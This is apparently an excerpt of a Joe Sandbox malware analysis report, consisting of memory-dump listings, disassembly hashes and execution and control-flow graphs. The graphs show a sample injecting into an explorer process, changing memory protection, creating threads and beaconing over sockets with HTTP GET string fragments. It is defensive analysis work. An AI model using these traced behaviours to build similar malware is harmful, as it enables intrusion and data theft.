                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID:
                                                                                • API String ID: 3446177414-0
                                                                                • Opcode ID: d7b4d0c52a82cddc6d60ab3077bc7bfa9d54c7ea39e5e541d644301e82167fc7
                                                                                • Instruction ID: c82f1e047027065b9b5fcb5169914fdc71ddbe47150d9a95f43a6b4a4bef5dc3
                                                                                • Opcode Fuzzy Hash: d7b4d0c52a82cddc6d60ab3077bc7bfa9d54c7ea39e5e541d644301e82167fc7
                                                                                • Instruction Fuzzy Hash: C4714771E002299FDF09DFA5C984BADBBB5FF48324F14406AEA05EB254D734A906CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID:
                                                                                • API String ID: 3446177414-0
                                                                                • Opcode ID: 9dc9ab9d12280dab27c292091bf961c76dcff43f037fb90cc3cea62ec0ae1399
                                                                                • Instruction ID: 1f3ce270da96abe6471f152197068df0fa9b3df34c659b820c50cde79a556553
                                                                                • Opcode Fuzzy Hash: 9dc9ab9d12280dab27c292091bf961c76dcff43f037fb90cc3cea62ec0ae1399
                                                                                • Instruction Fuzzy Hash: FF511272E002199FDF09CF98D8896EDBBB5BB48324F1481AAE905AB254D7389942CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 7443ed51ac200cd27685e6a3f9fdf69af967fa7eff34fa9058442fbf02a5261a
                                                                                • Instruction ID: 9fd13f456078c166e0b8664a431b7b9a07e77af9e9ee1920563e82fe2476cf66
                                                                                • Opcode Fuzzy Hash: 7443ed51ac200cd27685e6a3f9fdf69af967fa7eff34fa9058442fbf02a5261a
                                                                                • Instruction Fuzzy Hash: D1323770D0426ADFDB39DF68C884BE9BBB4BB19304F0081E9D54DA7241E7749A88DF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                • Instruction ID: a6461f08fb80e5ff03e56920b5b04ad3599892d85c2f9aea125749d002781c18
                                                                                • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                • Instruction Fuzzy Hash: 0A91A771E002469BDF2CDF6DC880ABEBBADEF64724F14469AE955A72C0DF3C89408751
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: Bl$l
                                                                                • API String ID: 3446177414-208461968
                                                                                • Opcode ID: 737aa8d838bea408ed6ebbeceeb9068ca10c6a2372c717e0141fa7b812a7eb2d
                                                                                • Instruction ID: 99a54d8294ba82eec54a273d89c40307e5479bc573d647fe73b8b652ab8f3958
                                                                                • Opcode Fuzzy Hash: 737aa8d838bea408ed6ebbeceeb9068ca10c6a2372c717e0141fa7b812a7eb2d
                                                                                • Instruction Fuzzy Hash: 1DA1E531A003298BEF39DB98C890BADB7B5FB85704F8441E9D90967241CB74AE95CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 01B65E34
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: e6148f89d0a187ba60044313d28543f8930bdf122360bd847c3d1370fa8b4ddf
                                                                                • Instruction ID: 8b70256663c52c8faba83506999294cbec8ef8c20fc3f6429dda0fe724f54acd
                                                                                • Opcode Fuzzy Hash: e6148f89d0a187ba60044313d28543f8930bdf122360bd847c3d1370fa8b4ddf
                                                                                • Instruction Fuzzy Hash: C9514C71B18106D6DF3D771CCA013692FACEB70790F14C9E8E1D6C6299DB3C84A68746
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$Flst
                                                                                • API String ID: 0-758220159
                                                                                • Opcode ID: 8b9be92bb515d040746e20191231a128b380fb8f78fda3d4aef20aee43c30b0a
                                                                                • Instruction ID: 5013fa73560f174e26df2f200326d63104bc7f6cfbf7734bd24d19c4a7871ec9
                                                                                • Opcode Fuzzy Hash: 8b9be92bb515d040746e20191231a128b380fb8f78fda3d4aef20aee43c30b0a
                                                                                • Instruction Fuzzy Hash: 75518FB1E002188FDF6ACFA9C4847A9FBF4FF45714F1580AAD4499B291EB719D85CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlDebugPrintTimes.NTDLL ref: 01B4D959
                                                                                  • Part of subcall function 01B24859: RtlDebugPrintTimes.NTDLL ref: 01B248F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: $$$
                                                                                • API String ID: 3446177414-233714265
                                                                                • Opcode ID: a456f763f87e6754a57341f5780be81f38f7b78c841fe93e1a0645ee2876eee9
                                                                                • Instruction ID: 19fdaab40145947c1a59e38a0a73c225a70840b29b475d75dac1f414e643138c
                                                                                • Opcode Fuzzy Hash: a456f763f87e6754a57341f5780be81f38f7b78c841fe93e1a0645ee2876eee9
                                                                                • Instruction Fuzzy Hash: C0510171A003469FEB29DFA8D4847ADBBB1FFA9704F1481DDD406AB281D770E845DB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: $
                                                                                • API String ID: 3446177414-3993045852
                                                                                • Opcode ID: bc17f203b783a36bb5a20d052e687bcddd920a94ce1f76f5d6d1938a16a8516a
                                                                                • Instruction ID: 0fef2d15e72107281cbdbf4736049afa50f0d1e958f0ba99ab32e1e7f84b963a
                                                                                • Opcode Fuzzy Hash: bc17f203b783a36bb5a20d052e687bcddd920a94ce1f76f5d6d1938a16a8516a
                                                                                • Instruction Fuzzy Hash: D541BC75A00609ABDF1ADF99C980AEEBFB5FF48724F1440A9E900A7341D730D902CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: 0$0
                                                                                • API String ID: 3446177414-203156872
                                                                                • Opcode ID: 9da54489074bab6597a48d40e16d22fe62f05b95c0ffc1ab6d49595548d95a6f
                                                                                • Instruction ID: f179441af290609d52fe53374f309e1040469498aa544bb726407ea4a94e9939
                                                                                • Opcode Fuzzy Hash: 9da54489074bab6597a48d40e16d22fe62f05b95c0ffc1ab6d49595548d95a6f
                                                                                • Instruction Fuzzy Hash: F8416AB16087069FC315CF28C488A16BBE4FB8D314F054AAEF989DB341D771EA05CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:2.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:8%
                                                                                Total number of Nodes:113
                                                                                Total number of Limit Nodes:14
                                                                                execution_graph 27004 94b014a 27005 94b0153 27004->27005 27010 94b0174 27004->27010 27013 94b2382 ObtainUserAgentString 27005->27013 27006 94b01c9 SleepEx 27006->27010 27007 94b01e7 27009 94b016c 27014 94ab0f2 6 API calls 27009->27014 27010->27006 27010->27007 27015 94ab1f2 7 API calls 27010->27015 27013->27009 27014->27010 27015->27010 27016 e481bac 27017 e481bb1 27016->27017 27048 e481bb6 27017->27048 27049 e477b72 27017->27049 27019 e481c2c 27020 e481c85 27019->27020 27022 e481c69 27019->27022 27023 e481c54 27019->27023 27019->27048 27062 e47fab2 NtProtectVirtualMemory 27020->27062 27026 e481c6e 27022->27026 27027 e481c80 27022->27027 27058 e47fab2 NtProtectVirtualMemory 27023->27058 27024 e481c8d 27063 e479102 NtProtectVirtualMemory 27024->27063 27060 e47fab2 NtProtectVirtualMemory 27026->27060 27027->27020 27028 e481c97 27027->27028 27032 e481c9c 27028->27032 27033 e481cbe 27028->27033 27030 e481c5c 27059 e478ee2 NtProtectVirtualMemory 27030->27059 27053 e47fab2 NtProtectVirtualMemory 27032->27053 27037 e481cd9 27033->27037 27038 e481cc7 27033->27038 27033->27048 27035 e481c76 27061 e478fc2 NtProtectVirtualMemory 27035->27061 27037->27048 27066 e47fab2 NtProtectVirtualMemory 27037->27066 27064 e47fab2 NtProtectVirtualMemory 27038->27064 27041 e481ccf 27065 e4792f2 NtProtectVirtualMemory 27041->27065 27043 e481cac 27054 e475412 27043->27054 27045 e481ce5 27067 e479712 NtProtectVirtualMemory 27045->27067 27051 e477b93 27049->27051 27050 e477cce 27050->27019 27051->27050 27052 e477cb5 CreateMutexW 27051->27052 27052->27050 27053->27043 27056 e475440 27054->27056 27055 e475473 27055->27048 27056->27055 27057 e47544d CreateThread 27056->27057 27057->27048 27058->27030 27059->27048 27060->27035 27061->27048 27062->27024 27063->27048 27064->27041 27065->27048 27066->27045 27067->27048 27068 94b7bac 27069 94b7bb1 27068->27069 27090 94b7bb6 27069->27090 27091 94adb72 27069->27091 27074 94b7c85 27101 94af102 ObtainUserAgentString 27074->27101 27075 94b7c69 27077 94b7c80 27075->27077 27081 94b7c6e 27075->27081 27076 94b7c54 27099 94aeee2 ObtainUserAgentString 27076->27099 27077->27074 27078 94b7c97 27077->27078 27082 94b7cbe 27078->27082 27085 94b7c9c 27078->27085 27100 94aefc2 ObtainUserAgentString 27081->27100 27084 94b7cc7 27082->27084 27087 94b7cd9 27082->27087 27082->27090 27103 94af2f2 ObtainUserAgentString 27084->27103 27102 94aede2 ObtainUserAgentString 27085->27102 27087->27090 27104 94af712 ObtainUserAgentString 27087->27104 27093 94adb93 27091->27093 27092 94adcce 27092->27090 27095 94b01f2 27092->27095 27093->27092 27094 94adcb5 CreateMutexW 27093->27094 27094->27092 27097 94b0220 27095->27097 27096 94b0328 27096->27074 27096->27075 27096->27076 27096->27090 27097->27096 27098 94b0312 CreateThread 27097->27098 27098->27096 27099->27090 27100->27090 27101->27090 27102->27090 27103->27090 27104->27090 27105 94b18c2 27107 94b1934 27105->27107 27106 94b19a6 27107->27106 27108 94b1995 ObtainUserAgentString 27107->27108 27108->27106 27109 94b6f82 27110 94b6fb8 27109->27110 27113 94b7081 27110->27113 27120 94b7022 27110->27120 27121 94b35b2 27110->27121 27112 94b7134 27116 94b71b2 27112->27116 27112->27120 27124 94b3732 27112->27124 27113->27112 27115 94b7117 getaddrinfo 27113->27115 27113->27120 27115->27112 27116->27120 27127 94b36b2 27116->27127 27118 94b77f4 setsockopt recv 27118->27120 27119 94b7729 27119->27118 27119->27120 27122 94b360a socket 27121->27122 27123 94b35ec 27121->27123 27122->27113 27123->27122 27125 94b376a 27124->27125 27126 94b3788 connect 27124->27126 27125->27126 27126->27116 27128 94b36e7 27127->27128 27129 94b3705 send 27127->27129 27128->27129 27129->27119 27130 94b6232 27131 94b625c 27130->27131 27133 94b6334 27130->27133 27132 94b6410 NtCreateFile 27131->27132 27131->27133 27132->27133 27134 e4752dd 27135 e47531a 27134->27135 27136 e4753fa 27135->27136 27137 e475328 SleepEx 27135->27137 27141 e47ff12 7 API calls 27135->27141 27142 e476432 NtCreateFile 27135->27142 27143 e4750f2 6 API calls 27135->27143 27137->27135 27137->27137 27141->27135 27142->27135 27143->27135 27165 e481e12 27166 e481e45 NtProtectVirtualMemory 27165->27166 27169 e480942 27165->27169 27168 e481e70 27166->27168 27170 e480967 27169->27170 27170->27166

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 94b6f82-94b6fb6 1 94b6fb8-94b6fbc 0->1 2 94b6fd6-94b6fd9 0->2 1->2 3 94b6fbe-94b6fc2 1->3 4 94b6fdf-94b6fed 2->4 5 94b78fe-94b790c 2->5 3->2 6 94b6fc4-94b6fc8 3->6 7 94b6ff3-94b6ff7 4->7 8 94b78f6-94b78f7 4->8 6->2 9 94b6fca-94b6fce 6->9 10 94b6ff9-94b6ffd 7->10 11 94b6fff-94b7000 7->11 8->5 9->2 12 94b6fd0-94b6fd4 9->12 10->11 13 94b700a-94b7010 10->13 11->13 12->2 12->4 14 94b703a-94b7060 13->14 15 94b7012-94b7020 13->15 16 94b7068-94b707c call 94b35b2 14->16 17 94b7062-94b7066 14->17 15->14 18 94b7022-94b7026 15->18 22 94b7081-94b70a2 16->22 17->16 19 94b70a8-94b70ab 17->19 18->8 21 94b702c-94b7035 18->21 23 94b70b1-94b70b8 19->23 24 94b7144-94b7150 19->24 21->8 22->19 25 94b78ee-94b78ef 22->25 27 94b70ba-94b70dc call 94b6942 23->27 28 94b70e2-94b70f5 23->28 24->25 26 94b7156-94b7165 24->26 25->8 29 94b717f-94b718f 26->29 30 94b7167-94b7178 call 94b3552 26->30 27->28 28->25 32 94b70fb-94b7101 28->32 34 94b7191-94b71ad call 94b3732 29->34 35 94b71e5-94b721b 29->35 30->29 32->25 37 94b7107-94b7109 32->37 44 94b71b2-94b71da 34->44 40 94b722d-94b7231 35->40 41 94b721d-94b722b 35->41 37->25 42 94b710f-94b7111 37->42 46 94b7233-94b7245 40->46 47 94b7247-94b724b 40->47 45 94b727f-94b7280 41->45 42->25 43 94b7117-94b7132 getaddrinfo 42->43 43->24 48 94b7134-94b713c 43->48 44->35 52 94b71dc-94b71e1 44->52 51 94b7283-94b72e0 call 94b7d62 call 94b4482 call 94b3e72 call 94b8002 45->51 46->45 49 94b724d-94b725f 47->49 50 94b7261-94b7265 47->50 48->24 49->45 53 94b726d-94b7279 50->53 54 94b7267-94b726b 50->54 63 94b72e2-94b72e6 51->63 64 94b72f4-94b7354 call 94b7d92 51->64 52->35 53->45 54->51 54->53 63->64 65 94b72e8-94b72ef call 94b4042 63->65 69 94b735a-94b7396 call 94b7d62 call 94b8262 call 94b8002 64->69 70 94b748c-94b74b8 call 94b7d62 call 94b8262 64->70 65->64 85 94b73bb-94b73e9 call 94b8262 * 2 69->85 86 94b7398-94b73b7 call 94b8262 call 94b8002 69->86 79 94b74ba-94b74d5 70->79 80 94b74d9-94b7590 call 94b8262 * 3 call 94b8002 * 2 call 94b4482 70->80 79->80 112 94b7595-94b75b9 call 94b8262 80->112 101 94b73eb-94b7410 call 94b8002 call 94b8262 85->101 102 94b7415-94b741d 85->102 86->85 101->102 105 94b741f-94b7425 102->105 106 94b7442-94b7448 102->106 109 94b7467-94b7487 call 94b8262 105->109 110 94b7427-94b743d 105->110 111 94b744e-94b7456 106->111 106->112 109->112 110->112 111->112 117 94b745c-94b745d 111->117 121 94b75bb-94b75cc call 94b8262 call 94b8002 112->121 122 94b75d1-94b76ad call 94b8262 * 7 call 94b8002 call 94b7d62 call 94b8002 call 94b3e72 call 94b4042 112->122 117->109 132 94b76af-94b76b3 121->132 122->132 135 94b76ff-94b772d call 94b36b2 132->135 136 94b76b5-94b76fa call 94b3382 call 94b37b2 132->136 143 94b772f-94b7735 135->143 144 94b775d-94b7761 135->144 152 94b78e6-94b78e7 136->152 143->144 147 94b7737-94b774c 143->147 148 94b790d-94b7913 144->148 149 94b7767-94b776b 144->149 147->144 153 94b774e-94b7754 147->153 154 94b7779-94b7784 148->154 155 94b7919-94b7920 148->155 156 94b78aa-94b78df call 94b37b2 149->156 157 94b7771-94b7773 149->157 152->25 153->144 159 94b7756 153->159 160 94b7786-94b7793 154->160 161 94b7795-94b7796 154->161 155->160 156->152 157->154 157->156 159->144 160->161 165 94b779c-94b77a0 160->165 161->165 167 94b77a2-94b77af 165->167 168 94b77b1-94b77b2 165->168 167->168 170 94b77b8-94b77c4 167->170 168->170 173 94b77c6-94b77ef call 94b7d92 call 94b7d62 170->173 174 94b77f4-94b7861 setsockopt recv 170->174 173->174 177 94b78a3-94b78a4 174->177 178 94b7863 174->178 177->156 178->177 181 94b7865-94b786a 178->181 181->177 184 94b786c-94b7872 181->184 184->177 186 94b7874-94b78a1 184->186 186->177 186->178
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: getaddrinforecvsetsockopt
                                                                                • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                • API String ID: 1564272048-1117930895
                                                                                • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                • Instruction ID: 5e885bc28012023ab3fa9ee68ddd1caf3ee830d3b457dfe089ac3c9bd66f81a1
                                                                                • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                • Instruction Fuzzy Hash: 08528231614A088FDB29EF68C4947EAB7E1FB94304F50452FD49FCB646EE30A546CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 566 94b6232-94b6256 567 94b68bd-94b68cd 566->567 568 94b625c-94b6260 566->568 568->567 569 94b6266-94b62a0 568->569 570 94b62bf 569->570 571 94b62a2-94b62a6 569->571 573 94b62c6 570->573 571->570 572 94b62a8-94b62ac 571->572 574 94b62ae-94b62b2 572->574 575 94b62b4-94b62b8 572->575 576 94b62cb-94b62cf 573->576 574->573 575->576 577 94b62ba-94b62bd 575->577 578 94b62f9-94b630b 576->578 579 94b62d1-94b62f7 call 94b6942 576->579 577->576 583 94b6378 578->583 584 94b630d-94b6332 578->584 579->578 579->583 585 94b637a-94b63a0 583->585 586 94b63a1-94b63a8 584->586 587 94b6334-94b633b 584->587 588 94b63aa-94b63d3 call 94b6942 586->588 589 94b63d5-94b63dc 586->589 590 94b633d-94b6360 call 94b6942 587->590 591 94b6366-94b6370 587->591 588->583 588->589 595 94b63de-94b640a call 94b6942 589->595 596 94b6410-94b6458 NtCreateFile call 94b6172 589->596 590->591 591->583 593 94b6372-94b6373 591->593 593->583 595->583 595->596 601 94b645d-94b645f 596->601 601->583 603 94b6465-94b646d 601->603 603->583 604 94b6473-94b6476 603->604 605 94b6478-94b6481 604->605 606 94b6486-94b648d 604->606 605->585 607 94b648f-94b64b8 call 94b6942 606->607 608 94b64c2-94b64ec 606->608 607->583 613 94b64be-94b64bf 607->613 614 94b68ae-94b68b8 608->614 615 94b64f2-94b64f5 608->615 613->608 614->583 616 94b64fb-94b64fe 615->616 617 94b6604-94b6611 615->617 618 94b655e-94b6561 616->618 619 94b6500-94b6507 616->619 617->585 624 94b6567-94b6572 618->624 625 